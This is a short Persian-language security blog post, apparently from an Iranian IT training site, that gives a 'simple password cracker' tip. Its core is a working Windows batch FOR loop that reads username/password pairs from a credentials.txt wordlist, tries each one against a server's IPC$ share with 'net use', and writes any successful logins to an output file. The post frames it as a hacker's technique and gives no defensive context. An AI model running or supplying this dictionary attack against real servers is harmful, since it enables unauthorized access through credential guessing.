Loading…

جزیره امنیت اطلاعات و ارتباطات

ارسال کننده: UNITY
محمد نصیری ، بنیانگذار TOSINSO ، کارشناس امنیت اطلاعات و ارتباطات و کشف جرائم رایانه ای ، هکر کلاه سفید ، تخصص در حوزه امنیت سیستم عامل و تست های نفوذسنجی ، لینوکس ، مجازی سازی ، سرویس های کاربردی سرور و ... سابقه همکاری در بیش از 40 سازمان دولتی ، خصوصی و نظامی در حوزه پروژه ، مشاوره و آموزش ، بیش از 10 هزار ساعت سابقه آموزشی در طی 12 سال فعالیت حرفه ای ...
ارسال پیام خصوصی
امتیازات این مطلب
نکته: ساده ترین روش برای نوشتن یک برنامه Password Cracker
یکی از ساده ترین روش های Password Cracking بدون نیاز به هرگونه برنامه و نرم افزار خاص استفاده از حلقه FOR ساده در Batch Scripting ویندوز یا حتی لینوکس می باشد. شما در مثال زیر می توانید مشاهده کنید که هکر براحتی با استفاده از یک فایل متنی بسیار ساده username ها و password های کاربران را جستجو و کرک می کند. این فایل متنی مثل همان فایل متنی است که در نرم افزارهای کرک برای Dictionary Attack مورد استفاده قرار می گیرد. در برنامه پایین حلقه FOR ما براحتی خط به خط فایل مورد نظر را خوانده و تست می کند که آیا پسورد ورود به سرور در آن وجود دارد یا خیر ، در ابتدای خطوط سطح دسترسی های مورد نیاز برای دسترسی به فایل درون سیستم داده شده است و از طرفی در ادامه برای اجرا شدن اسکریپت مورد نیاز حتما باید به دایرکتوری که در آن ساخته شده است با استفاده از CMD مراجعه شود :
[file: credentials.txt] administrator "" 
administrator password 
administrator administrator 
--------------------------------------------------------------------
c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
More? do net use \\tosinso.com\IPC$ %j /u:tosinso.com\%i^ More? 2 >> nul^
 More? && echo %time% %date% >> outfile.txt^
 More? && echo \\tosinso.com acct: %i pass: %j >> outfile.txt 
c:\>type outfile.txt

اگر در مثال بالا حلقه بتواند username و password معتبری از سرور هدف که tosinso.com است پیدا کند آن را در قالب فایلی به نام output.txt برای شما خارج می کند. در مثال بالا در اصطلاح برای ارتباط با سرور از یک Null Session استفاده شده است که قبلا در ITPRO بصورت کامل آن را معرفی کرده ایم. ITPRO باشید

نویسنده : محمد نصیری
منبع : ITPRO
هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد

دیدگاه ها

هیچ دیدگاهی برای این مطلب ارسال نشده است

برای ارسال نظر وارد شوید.

Countdown